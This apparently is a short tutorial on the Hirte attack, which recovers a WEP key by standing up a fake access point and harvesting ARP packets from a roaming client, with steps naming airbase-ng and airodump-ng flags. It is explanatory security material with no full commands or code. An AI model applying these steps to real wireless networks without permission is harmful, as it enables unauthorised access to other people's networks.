The only requirement for this attack is to setup a fake access point with the same SSID of the WEP network. When the client device will try to connect automatically then ARP packets will be sent from the fake access point (attacker machine) to the device and the other way around which they will contain part of the keystream.
Breakdown of the Hirte Attack
- Setup a fake WEP AP and waits for a client to connect
- Upon connection of a client waits for auto-configuration IP address
- Client sends an ARP packet
- Obtain the ARP packet and converts it into an ARP request for the same client
- Client replies
- Collect these packets
- Crack the WEP key
Deployment of Hirte AttackThe first step is to create the WEP access point with the use of the tool airbase-ng. The -c variable defines the channel, the -W sets the encryption bit, mon0 is the interface and the -N enables the Hirte attack mode.
The next step is to configure airodump-ng to capture packets and to write those in a file called Hirte.
ConclusionAs we saw with the Hirte attack someone is able to crack the WEP wireless key from a network just by exploiting a roaming client and without attacking the access point at all. This happened because the wireless configuration including the WEP key was stored on the device and client had the option to connect automatically to this wireless network when it was found in range. In a summary this attack uses the following principles:
- It is a fragmentation attack
- Targets isolated clients
- Collects ARP packets that contain the WEP key.